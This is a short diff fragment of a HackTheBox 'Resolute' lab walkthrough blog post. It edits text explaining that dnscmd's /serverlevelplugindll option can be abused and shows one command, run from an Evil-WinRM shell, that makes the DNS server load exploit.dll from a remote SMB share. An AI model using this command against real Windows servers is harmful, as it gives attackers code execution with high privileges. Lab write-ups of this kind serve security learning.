1n4r1/1n4r1.github.io/_posts/2020-06-01-Hackthebox-Resolute-Walkthrough.md

 ```

-[dnscmd](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd) has an option `/serverlevelplugindll` to load an external dll file.<br>
+[dnscmd](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd) has an option `/serverlevelplugindll` to load an external dll filea nd we can take advantage of that.<br>
-We can take advantage of that.
+After setting the configuration, we have to restart the DNS server with `sc` command.
 ```shell
 *Evil-WinRM* PS C:\Users\ryan\Documents> cmd /c dnscmd localhost /config /serverlevelplugindll \\10.10.14.22\share\exploit.dll